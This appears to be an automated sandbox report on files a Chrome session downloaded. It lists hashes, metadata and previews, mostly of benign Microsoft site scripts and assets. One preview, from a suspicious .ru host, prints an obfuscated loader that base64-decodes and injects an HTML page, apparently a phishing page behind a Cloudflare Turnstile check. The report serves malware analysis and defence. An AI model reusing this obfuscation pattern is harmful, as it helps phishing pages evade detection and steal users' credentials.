                                                                                                                                                                                                                                                          SSDEEP:24:tYU/duAyjKLuB8jnafFl+sghXRuh30+GuwrVcsbeu6uV4LTD+29ww/b0F2KcDh:n/sKLu2afuhXRuhNGuwJSsUiaZ/42Kcd
                                                                                                                                                                                                                                                          MD5:29E9B36995DBCDDFEE5BCFC013C2E695
                                                                                                                                                                                                                                                          SHA1:A7A7A240495116E98296BBA513DAD863C7748EC6
                                                                                                                                                                                                                                                          SHA-256:97F584E82B7B6C7A96DA0B8C0D2211B5DD550E5F731621FC57E7A6DC03D0C3CA
                                                                                                                                                                                                                                                          SHA-512:88CA3C8F04DEBB8FEA817A93E4F3E4374297865D1AE22B086503228FF3BDABB284CD41BC7CFC98A4EBDE65B366AFABA233D384A45135B338DEDC93101E95E877
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:<svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M4 6C4 5.30945 4.3153 4.70664 4.77423 4.22025C5.2294 3.73784 5.85301 3.33745 6.56668 3.01752C7.99575 2.3769 9.91738 2 12 2C14.0826 2 16.0042 2.3769 17.4333 3.01752C18.147 3.33745 18.7706 3.73784 19.2258 4.22025C19.6847 4.70664 20 5.30945 20 6V18C20 18.6906 19.6847 19.2934 19.2258 19.7798C18.7706 20.2622 18.147 20.6626 17.4333 20.9825C16.0042 21.6231 14.0826 22 12 22C9.91738 22 7.99575 21.6231 6.56668 20.9825C5.85301 20.6626 5.2294 20.2622 4.77423 19.7798C4.3153 19.2934 4 18.6906 4 18V6ZM5.5 6C5.5 6.20691 5.59044 6.45909 5.86525 6.75034C6.14382 7.04559 6.58195 7.3455 7.18027 7.61372C8.37519 8.14937 10.0786 8.5 12 8.5C13.9214 8.5 15.6248 8.14937 16.8197 7.61372C17.418 7.3455 17.8562 7.04559 18.1348 6.75034C18.4096 6.45909 18.5 6.20691 18.5 6C18.5 5.79309 18.4096 5.54091 18.1348 5.24966C17.8562 4.95441 17.418 4.65449 16.8197 4.38628C15.6248 3.85063 13.9214 3.5 12 3.5C10.0786 3.5 8.3751
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):1
                                                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:U:U
                                                                                                                                                                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://qyirfeifkmxfpzq40aunypu4fmz8ucnejoritjokcewctv5c9qybgue.lpliwptf.ru/ZATfZymFloKYOUYHhMIPbYQbYmLCVGEUSJTYXKLELYVOVSTVWWBDRAXVWRBSWFMJQXZNOKQCTXW
                                                                                                                                                                                                                                                          Preview:1
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (12824)
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):58060
                                                                                                                                                                                                                                                          Entropy (8bit):5.596324920359172
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:EFkYe2qD3D1Ug5yKiXcvh5kCThY6g3Eh6rtLMs5M:SY5yKiSin7RFy
                                                                                                                                                                                                                                                          MD5:1986FCF12655BE6003E39A655BEB6F0F
                                                                                                                                                                                                                                                          SHA1:0C90899E47927E6D63E445B6BFE9C986E8621830
                                                                                                                                                                                                                                                          SHA-256:F66185BEC9D95EC9E4C49D1B38F433AB51AEF9853B21B5D3C0DA54F3987EAF0C
                                                                                                                                                                                                                                                          SHA-512:FAD912AC31C6297A4D4EAA4FC263C5EF8ECA0281D79213B64CE606BBC124B0BFD7F1CADF47C34560406AC804EEF87922E25F7D054B3C539F3AE95D30C8EE7FAB
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:/*! Static Override Utilities */.(()=>{window.SOUtil=window.SOUtil||{addStylesheet:(cssStyles,overrideId)=>{const style=document.createElement("style");if(overrideId){style.id="static-override-"+overrideId}style.appendChild(document.createTextNode(cssStyles));document.head.appendChild(style)},pageIsInScope:pageScope=>{const host=location.hostname;const path=location.pathname;const locale=document.documentElement.lang.toLowerCase();const getMarket=marketAware=>{const locale=document.documentElement.lang.toLowerCase();const langCode=locale.split("-")[0];const market=new URLSearchParams(location.search).get("market")?.toLowerCase();if(market&&marketAware!==false){return`${langCode}-${market}`}return locale};const langLocs={"sr-rs":["sr-rs","sr-latn-rs","sr-cyrl-rs"],default:[locale]};const possibleLangLocs=langLocs[locale]||langLocs.default;const pathLocale=possibleLangLocs.find(loc=>path.indexOf(loc)!==-1);const pathNoLocale=path.replace(`/${pathLocale}`,"").replace(/\/$/,"");const previ
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):836
                                                                                                                                                                                                                                                          Entropy (8bit):6.944112371702667
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:+cK/gj6qWhaFBzC6l1xWYJwq13qKZeQeyVFDZemrwN2pG1nxgloTsNN5m:+cKYj6LAzXLJn3ZReyfrNpG1xF
                                                                                                                                                                                                                                                          MD5:A4D31E77D95CABD70E5D88128E03F114
                                                                                                                                                                                                                                                          SHA1:AA682837F93B9956F81C387EC850EDA852ACE98B
                                                                                                                                                                                                                                                          SHA-256:214A848E042AAE43FFF9C74154FCE5331503F71DB2FC430C62C027C3F93B3311
                                                                                                                                                                                                                                                          SHA-512:52F589A222AB40F0A8F5CAF8AA8F90CA371E67BB6AA2E17C36B8103EDB1232218AB6357ACA8C26D09BB6D706CA515EAC58197BE82E7286C58EDC24BB256E1011
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Social_Media_Logo_FB?scl=1
                                                                                                                                                                                                                                                          Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D................*...(iinf..........infe........av01Color....jiprp...Kipco....ispe................pixi............av1C........colrnclx...........ipma..................2mdat........h...B2......Q...:w...L?....F2.9c......e.n[...X..A..Aa.?..2.._.y.8.h....n....4..........~.i....j...}r....lD...O......_.g..L....b..r.W$WR.3.nBe..(...".....a.a./..B......#.N..P^..[D...(5.z..;#E.X..*..1..Tb.GT2.{P^........o........G7....^i.|..".Kx..e)-.MK....u{.y..?.U..p...I$...t/_.[.x.P.3.2..t..:.ii$P.I.../...qV.VBt.....x.wLZe.g...0R.0.K'.H~..o....,Y6.A6N.-I?.b...y.yL.!..ba..\|X!u...&...g......3.....N...oI...Q..E.....<.*%...0.......a..<...f..c.p..i.F.....J. ..:,....4.r.Qa...P/.=.].UV!4.e1..Tu.?.....R..H..+NX.#i...28.4QY..
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:C++ source, ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):3280
                                                                                                                                                                                                                                                          Entropy (8bit):4.696081700274861
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:mVZw3gPuCrA3sLT1m7RArtNmOuLT2LZ0dZyMLtZ/AmVT8TZi:mVZ4gPuCQqBQRArtMOEalxMLtZ47i
                                                                                                                                                                                                                                                          MD5:1C7E214F5AF8CAA06F783A38D40127C6
                                                                                                                                                                                                                                                          SHA1:61F88B722FAA7A7AE86D354DBCFC1D771FF23289
                                                                                                                                                                                                                                                          SHA-256:9EA42247944D18B77EB76FBCCAF1774559B6F312B1376002F553C4ECB827E4C5
                                                                                                                                                                                                                                                          SHA-512:559A3FA3364B742E5915E871333C043CF27F25110D3A624D0CDDC75DEE795F8633EB0C8A3186F2088B52516C1BC3A90F13545F9415278F3A4A52992AB7E8C96C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:class OneCloudUtil {.. /**. * Get the API endpoint for the OneCloud Data Connector.. * @param {string} path - The path to append to the API endpoint.. * @param {string} querystring - The query string to add to the API endpoint.. * @returns {string} - The API endpoint with the environment specific query parameters.. */. static getMsocapiurl = (path, querystring) => {. let url = `${OneCloudEnvironmentConstants.DataConnector.endpoint}${path}`;. let envQueryParamKeys = Object.keys(OneCloudEnvironmentConstants.DataConnector.queryParams);.. // Add passed query string.. if(querystring && querystring.length > 0) {. url += `?${querystring}`;. } else if (envQueryParamKeys.length > 0) {. url += '?';. } .. // Add environment specific query parameters and return.. return OneCloudUtil.addEnvironmentSpecificQueryParams(url);;. }.. /**. * Add environment specific query parameters to the url.. * @param {string} url - The url to add the query paramete
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:C++ source, ASCII text
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):3116
                                                                                                                                                                                                                                                          Entropy (8bit):4.431505373285771
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:e2rIqX/nyqHytWO/+75xy17A6d/X226/YU3/xopLk/OEBlKj/v4UPnxzgNar4n8u:lIAvyqSRcK66dODQhYUosRZg4hpRV6
                                                                                                                                                                                                                                                          MD5:B884EF4864D6867BD00AA4A7A5CFB368
                                                                                                                                                                                                                                                          SHA1:D45D8BD33632588A913575910B3D0EABD5AD3828
                                                                                                                                                                                                                                                          SHA-256:177F6B14CEB87D301946D00124195EBB755A452BA40ABCA5CF6A4E77E52222F5
                                                                                                                                                                                                                                                          SHA-512:375A8412459BBE64B6024C462D996B4B48DE246997BA36F5E26379F163D5FACA69CECC79E4FD246F92079A23DCD36AC2E8058D2C9663BA9D31C07C6786269581
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-localstorage.min.ACSHASHb884ef4864d6867bd00aa4a7a5cfb368.js
                                                                                                                                                                                                                                                          Preview:/*.*Utility class for handling data storage in the browser's local storage with encoding/decoding support..*Note: This class is designed for storing and retrieving objects in local storage. .*/ ..class LocalStorageUtil {. constructor(opts) {. // Set the storage key from options, defaulting to an empty object. this.storageKey = opts.storageKey || {}; . }. . /**. * Encode the value before storing in local storage. */. encodeValue = (value) => {. if(!value) {. return {};. }. . let encodedValue;. try {. encodedValue = window.btoa(JSON.stringify(value));. } catch(error) {. encodedValue = value. }. return encodedValue;. };. . /**. * Decode the value retrieved from local storage. */. decodeValue = (encodedValue) => {. if(!encodedValue) {. return {};. }. let decodedValue;. try {. decodedValue = window.atob(encodedValue); // Decode the encoded value.
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (7493), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):19970
                                                                                                                                                                                                                                                          Entropy (8bit):5.880050475326702
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:ROnuego5ZDkwDVvruIHlnuego5ZDkwDVvruIxlr5lrR:no5ZDXTuVo5ZDXTuYlr5lrR
                                                                                                                                                                                                                                                          MD5:A9F3B64066E8A29A07293C8C93E245B3
                                                                                                                                                                                                                                                          SHA1:8D07F29412B593BD9FEF3C1680A744630046EE14
                                                                                                                                                                                                                                                          SHA-256:52E3A651B10EB087AED6B43A7151A1CC1C29DB63B5F0ED9015699A7884DEEA7F
                                                                                                                                                                                                                                                          SHA-512:3F0C8CFBC32EF71BD64996B266DE63FA0340DA269D99C5FC0D5E9C93D9BE1D4C90A786A1E82CE14A92125B08EF49B2F36DB4C70F2D6E552D57246030C1251C8C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://gadk.quantumdhub.ru/HX8hiLPadaz1N7WrltpPjHg34q_2C98ig/
                                                                                                                                                                                                                                                          Preview:<script>../* The road to success and the road to failure are almost exactly the same. */..if(atob("aHR0cHM6Ly9zUy5xdWFudHVtZGh1Yi5ydS9IWDhoaUxQYWRhejFON1dybHRwUGpIZzM0cV8yQzk4aWcv") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJ
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:PNG image data, 22 x 93, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):61
                                                                                                                                                                                                                                                          Entropy (8bit):3.9821736799861016
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:yionv//thPlritlEsyxl/k4E08up:6v/lhPktlEB7Tp
                                                                                                                                                                                                                                                          MD5:17FCEBAA2F4E3E0B4BCF5DD7BAF5BEC8
                                                                                                                                                                                                                                                          SHA1:43933DC19D2306C3764AD18AB65E0D16B4B3D3D8
                                                                                                                                                                                                                                                          SHA-256:8DF68A283A6189DE7A194623DEEE99A13E17D439009D774353891F4B63E717A2
                                                                                                                                                                                                                                                          SHA-512:46872B99931030F6D2C37A82261FD36C36CAD4D42A609D8382996BEF6B0A86E4090C3696C85104C257E0CE4A988C7C5888FEDA7934F2BBC9380E62C97CBD1AD7
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8f53738f5cfa15bb/1734737757661/UAGFpR2sTVmHXbx
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.......]......I......IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (64241)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):171505
                                                                                                                                                                                                                                                          Entropy (8bit):5.043804815226508
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3072:jzCPZkTP3bDLH0tfRqQ0xtLfj4ZDSIpTt813viY8R1j35Ap7LQZLPPJH7PAbOCxb:jlZAW3kJeqg
                                                                                                                                                                                                                                                          MD5:8F186BBA557DC6140841C682AF4D60EE
                                                                                                                                                                                                                                                          SHA1:CE2F96E57EE3D9ED15B8A2DD3EBDC7E54439AF98
                                                                                                                                                                                                                                                          SHA-256:CDA4813A965CCD1AAA50550D08B928AAF4C7F50B6F77823213FE3A97E806C2F1
                                                                                                                                                                                                                                                          SHA-512:17ACC430C28A171C1FD029C1B0EB67BE14ED41ED9F7F10E4040ABA1FA39B8DA5CAC7CDF979BAB6CAFAD126AA94C88D123F170E78C51745C3833AE80AD23FB36A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/onerfstatics/marketingsites-eas-prod/west-european/shell/_scrf/css/themes=default.device=uplevel_web_pc/1b-9d8ed9/c9-be0100/a6-e969ef/43-9f2e7c/82-8b5456/a0-5d3913/52-918540/ca-ae3ce4?ver=2.0&_cf=02242021_3231
                                                                                                                                                                                                                                                          Preview:@charset "UTF-8";./*! | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*/./*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */.body{margin:0}.context-uh
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:C++ source, ASCII text
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):13110
                                                                                                                                                                                                                                                          Entropy (8bit):4.53925643908527
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:tSsg7eeMXX3/4WKtr0hi6QIG0LHDiX+JLBJ:csMedHgWKtJEGYjC+JLBJ
                                                                                                                                                                                                                                                          MD5:42FFFAB3ACD04EA132F8C11D5E26059F
                                                                                                                                                                                                                                                          SHA1:66A844D51A5ED1A66DDB733216A7A2EB25A5729F
                                                                                                                                                                                                                                                          SHA-256:2F495FCAD3C118DBB2E28E094960E942974B43BDA1A9F1243CBA290DADFF0D1D
                                                                                                                                                                                                                                                          SHA-512:10A8A51FC663D18FBB7AE39B01DB347CF383EE60A2FB5F758589C06BBD2FAD7A9C2B0E5C54639AC1EDA35426A646458E74F46944C1551E43AA6FCD6B4640DC3C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/components/content/market-selector/v1/market-selector/clientlibs/sites/base.min.ACSHASH42fffab3acd04ea132f8c11d5e26059f.js
                                                                                                                                                                                                                                                          Preview:(() => {. /** Create ocrReimagine namespace */. if (!window.ocrReimagine) {. window.ocrReimagine = {};. }.. /** Create Market Selector module namespace */. if (!window.ocrReimagine.MarketSelector) {. window.ocrReimagine.MarketSelector = {};. }.. const cookieExpiryDays = 30;. const cookieKey = 'PMGSKUMarketCk';. /** @type {MarketSelector[]} */. const instances = [];. const queryParamKey = 'market';.. /**. * CSS selector.. * @enum {string}. */. const Selector = {. AFFECTED: '[data-oc-market-selector]',. DATA_MOUNT: '[data-mount="market-selector"]',. FW_LINKS: '[data-regenerate-fwlink="true"]',. SELECT_MENU: '.custom-select-input'. };.. /**. * JS event name.. * @enum {string}. */. const EventName = {. ON_INIT: 'onInit',. ON_REFRESHED: 'onRefreshed',. ON_REMOVE: 'onRemove',. ON_SELECT: 'onSelect',. ON_UPDATE: 'onUpdate'. };.. /**. *
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (584)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):5006
                                                                                                                                                                                                                                                          Entropy (8bit):5.254875250489264
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:tYVv5eMnTpQA9CsC9MCCu2Axzwxf1QiEbyhTlZhZF4ntl:tOwMTpP9jUnN2Izwxf1hhTNZF4ntl
                                                                                                                                                                                                                                                          MD5:2954890B89E77EADECA4558085241308
                                                                                                                                                                                                                                                          SHA1:EE0E88A398434019AAA6EA8A38867494C585B31A
                                                                                                                                                                                                                                                          SHA-256:06E35DF1A5074DA424B0FFB0BE44F5DAE4209C8C52F1F9C2FC53572509031831
                                                                                                                                                                                                                                                          SHA-512:737CFA7B339504B4667D1AECD33C84F6E6FF9115CBA2C503126108D38B32326AE934BCC24F39116B3E6010D61489290DC9FB86B0625D9CC7082B426339F4E3F1
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/components/content/reimagine/atomic/tabs/v2/tabs/clientlib/sites.min.ACSHASH2954890b89e77eadeca4558085241308.js
                                                                                                                                                                                                                                                          Preview:'use strict';class FilterPanel{constructor(e){this.WRAPPER_ELEMENTS={tabList:e.tabList,tabPanel:e.tabPanel};this.SELECTORS={tabsWrapper:".tabs-wrapper",activeTab:".tab.active",activePillItem:".tab-panel.active .pill-bar__item.active",cardCarouselContainer:".appsource-grid-container",tabRole:"[role\x3dtab]"};this.MAPS={wrapperElements:{tabList:e.tabList,tabPanel:e.tabPanel},tabInstances:[],filterTabData:window.appsource.filterTabData};this.STRINGS={};this.CONFIG={filterTab_urlKey:"filterTab",filter_urlKey:"",.selectedTab:"categories",selectedTabDefault:"categories",selectedFilter:"ai-machine-learning",selectedFilterDefault:"ai-machine-learning",requiredURLParams:["filterTab","categories","industries","product"],isPageLoad:!0,isTabClick:!1,popstate:!1};this.ELEMENTS={};this._updateCards=()=>{};this._updateURL=()=>{const a=new URL(window.location.href),b=this._createQueryParams();this.CONFIG.requiredURLParams.forEach(c=>{a.searchParams.delete(c)});a.searchParams.set(this.CONFIG.filterTab_
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (678)
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):5243
                                                                                                                                                                                                                                                          Entropy (8bit):5.395959363705534
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:1CSAZUwgGG0g8WrsrArzrLHSaZDeZAZkqQZqp74SfCS9H/iNf/jxvR1SPkbQ2:4SUgGG0vWrsrArzCgGzqzBoFY8D
                                                                                                                                                                                                                                                          MD5:3DB5CF9FD3FAB92B3889302C8DE78D1B
                                                                                                                                                                                                                                                          SHA1:1C493C13BC775036B36ACBA37941375ED0CE2ADA
                                                                                                                                                                                                                                                          SHA-256:D29DB6171FCF5458896561430C466007D6E9709F83DF0CB950E273B93DDA7853
                                                                                                                                                                                                                                                          SHA-512:1B13D7AA880D8987B5120FB6BB21CE53F6FB7769061E35C2BB87B59F32F176D52FC7F208461A7603EDCE26318E022B75F2CB27791C5D7A7D826B2C141D33AA70
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:'use strict';(function(){function q(){return new Promise(function(e){window.oa=window.oa||{load:!0};(function(h,k){function m(b){b+="\x3d";for(var f=decodeURIComponent(h.cookie).split(";"),g=0;g<f.length;g++){for(var a=f[g];" "===a.charAt(0);)a=a.substring(1);if(0===a.indexOf(b))return a.substring(b.length,a.length)}return""}function p(b,f){if("function"===typeof b[3])b[3](b);var g=f.createElement("script");g.type="text/javascript";g.src=b[1];g.async=b[2];g.addEventListener("load",function(){b[4](b);.e()});g.addEventListener("readystatechange",function(){"complete"===this.readyState&&b[4](b)});if(b[8])b[8]();f.getElementsByTagName("head")[0].appendChild(g)}window.oa.container||(window.oa.container=!0,!function(b,f,g,a){for(var d=f.getElementsByTagName("script"),c=0;c<b.length;c++){var l=a(g.location.search.toLowerCase(),f.cookie),n=b[c];if(-1===Array.prototype.indexOf.call(d,f.location.protocol+n[1])&&n[6]&&n[0].test(f.location.href)){if(l!==n[5]&&null!==n[5]||m("bp_"+n[7].split(" ").j
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (509)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):775
                                                                                                                                                                                                                                                          Entropy (8bit):5.006726191017576
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:Tb0grd1xT5FeKlqyE8J6V8JIxbMfex8mAXpydmc7:Tb9k46tCfeLAXpyIc7
                                                                                                                                                                                                                                                          MD5:FE68B59E840A1A274393B3AB03C85E96
                                                                                                                                                                                                                                                          SHA1:C8C1B1196B05E9ADB6D342390956A231920B2017
                                                                                                                                                                                                                                                          SHA-256:9F01AEA27D73C422AC5E7E87C2F7F3CE364E1F940FAEB6CF3178B5E13CB43497
                                                                                                                                                                                                                                                          SHA-512:58921A6195363008A3DD65AF8D115828C3F93FB23CCCC9FB5D2FAF7AF55F5779EFBA947B990DEDF5B2751F3ED0BA4071F006873FFB68F77CCA3C8D565092A90D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/components/content/reimagine/blade/faqs/v2/faqs/clientlib/faqs.min.ACSHASHfe68b59e840a1a274393b3ab03c85e96.js
                                                                                                                                                                                                                                                          Preview:'use strict';(function(e){e.addEventListener("DOMContentLoaded",()=>{const a=$(".faq-collapse"),f={"bi-bhvr":{off:a.data("expandbhvr"),on:a.data("collapsebhvr")},"bi-cn":{off:a.data("expand"),on:a.data("collapse")},"bi-ecn":{off:a.data("enexpand"),on:a.data("encollapse")},"bi-ct":{off:a.data("expandtemplatename"),on:a.data("collapsetemplatename")}},d=b=>{const g=b.triggerElement.classList.contains("collapsed");Object.entries(f).forEach(([h,c])=>{b.triggerElement.setAttribute(`data-${h}`,g?c.off:c.on)})},.k=window.ocrReimagine.CollapseExtension.getInstances().filter(b=>b.triggerElement.classList.contains("ocr-faq-item__header"));0<a.length&&k.forEach(b=>{b.el.addEventListener("onHidden",d.bind(this,b));b.el.addEventListener("onShown",d.bind(this,b))})})})(document);
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):5009
                                                                                                                                                                                                                                                          Entropy (8bit):4.532689799994779
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:O4y/XHFCgOX1a9eD7EjHSlEusxsWpcTcaUXHcKg4paUxwq9XRrlJNRCBs5KssHNK:OvXH2X1H7ySlEus2WpWG3cN4pHR9XXjl
                                                                                                                                                                                                                                                          MD5:8F1B786599DDD1D6C94A1D907F2CB5FD
                                                                                                                                                                                                                                                          SHA1:4E5B3082D74407777629A4EE2B5DCA1768FF0C5D
                                                                                                                                                                                                                                                          SHA-256:20BF0322758485EE42D1480678AA5799087DAD8D0615AFCEF1448D0B34878AE3
                                                                                                                                                                                                                                                          SHA-512:FF10A31D0A94A78BB05AF0738A28ED65580F0DF5FA13CE3E69609407EB9D174B351B2139228A926FB3747245190213E28DEEB3F4CD7CBACA281CFE3E9923B87E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:/*******************************************************************************. * Copyright 2018 Adobe. *. * Licensed under the Apache License, Version 2.0 (the "License");. * you may not use this file except in compliance with the License.. * You may obtain a copy of the License at. *. * http://www.apache.org/licenses/LICENSE-2.0. *. * Unless required by applicable law or agreed to in writing, software. * distributed under the License is distributed on an "AS IS" BASIS,. * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.. * See the License for the specific language governing permissions and. * limitations under the License.. ******************************************************************************/.(function() {. "use strict";.. let count = 0;. const prefix = "__footnote";.. /**. * Jumps to elements location without being hidden by the page navigation menu (if any). * @param {Event} event . * @param {JQuery Object} jumpToEleme
